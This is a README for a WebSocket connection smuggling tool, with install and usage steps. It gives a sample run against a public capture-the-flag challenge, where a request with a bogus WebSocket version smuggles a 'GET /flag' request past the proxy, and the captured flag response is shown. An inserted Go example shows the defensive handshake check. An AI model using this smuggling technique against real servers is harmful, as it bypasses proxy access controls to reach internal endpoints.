websocket-connection-smuggler
Dependency
$ go get -u github.com/c-bata/go-prompt
Install
$ go get github.com/hahwul/websocket-connection-smuggler
or
$ git clone https://github.com/hahwul/websocket-connection-smuggler
$ cd websocket-connection-smuggler
$ go build
$ ./websocket-connection-smuggler
Usage
1. Run wcs (websocket-connection-smuggler)
$ websocket-connection-smuggler
2. Set the target address (domain or IP address)
$ WCS(...) > set target {your target}
3. Use SSL? (default is false)
# HTTPS
$ WCS(...) > set ssl true
# HTTP
$ WCS(...) > set ssl false
4. Set the original request (o_data)
This opens the default editor defined in the environment variables, such as vim or nano. If you don't have any special settings, vim is the default.
$ WCS(...) > set o_data
e.g.
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket
5. Set the smuggling request (s_data)
This opens the default editor defined in the environment variables, such as vim or nano. If you don't have any special settings, vim is the default.
$ WCS(...) > set s_data
e.g.
GET /flag HTTP/1.1
Host: localhost:5000
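A defensive counterpart to the requests above, as an added example (not code from this project): it checks a client upgrade request against the RFC 6455 handshake requirements, which the o_data sample in step 4 (Sec-WebSocket-Version: 4444, no Connection or Sec-WebSocket-Key header) does not meet, and lets a proxy treat a connection as an upgraded tunnel only when the backend actually answered 101. The function names handshakeProblems and mayTunnel and the sample response are constructed for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"net/http"
	"strings"
)

// Constructed sample: the o_data request from this README, with CRLF line endings.
const sampleUpgrade = "GET /socket.io/?transport-websocket HTTP/1.1\r\n" +
	"Host: localhost:80\r\nSec-WebSocket-Version: 4444\r\nUpgrade: websocket\r\n\r\n"

// handshakeProblems lists RFC 6455 violations in a raw client upgrade request.
func handshakeProblems(raw string) []string {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return []string{"unparseable request"}
	}
	var p []string
	if !strings.EqualFold(req.Header.Get("Upgrade"), "websocket") {
		p = append(p, "Upgrade header is not websocket")
	}
	if !strings.Contains(strings.ToLower(req.Header.Get("Connection")), "upgrade") {
		p = append(p, "Connection header lacks Upgrade token")
	}
	if v := req.Header.Get("Sec-WebSocket-Version"); v != "13" {
		p = append(p, "unsupported Sec-WebSocket-Version "+v)
	}
	if req.Header.Get("Sec-WebSocket-Key") == "" {
		p = append(p, "missing Sec-WebSocket-Key")
	}
	return p
}

// mayTunnel reports whether a proxy may switch the connection to a raw
// WebSocket tunnel: only when the backend answered 101 with Upgrade: websocket.
func mayTunnel(rawResp string) bool {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(rawResp)), nil)
	if err != nil {
		return false
	}
	defer resp.Body.Close()
	return resp.StatusCode == http.StatusSwitchingProtocols &&
		strings.EqualFold(resp.Header.Get("Upgrade"), "websocket")
}

func main() {
	fmt.Println(handshakeProblems(sampleUpgrade))
	fmt.Println(mayTunnel("HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")) // constructed response
}
```

A front-end that rejects requests for which handshakeProblems is non-empty, and keeps parsing HTTP on the connection whenever mayTunnel is false, does not hand a second request on the same connection to the backend unparsed.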
Test against the 0ang3el WebSocket Smuggling Challenge
___
/ \\
/\\ | . . \\
////\\| ||
//// \\ ___//\
/// \\ \
/// |\\ |
// | \\ \ \
/ | \\ \ \
| \\ / /
| \/ /
---------
WebSocket Connection Smuggler
by @hahwul
WCS(target=>None | ssl=>false ) > set target challenge.0ang3el.tk:80
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set o_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > set s_data
WCS(target=>challenge.0ang3el.tk:80 | ssl=>false ) > send
GET /socket.io/?transport-websocket HTTP/1.1
Host: localhost:80
Sec-WebSocket-Version: 4444
Upgrade: websocket
2019/11/30 03:39:15 HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 49
Date: Fri, 29 Nov 2019 18:39:15 GMT
{"flag": "In 50VI37 rUS5I4 vODK@ DRiNKs YOu!!!"}
gth: 119
Date: Fri, 29 Nov 2019 18:39:14 GMT
�0{"pingInterval":25000,"pingTimeout":60000,"upgrades":["websocket"],"sid":"5148720e07f240a99e6aa7457f41686f"}�40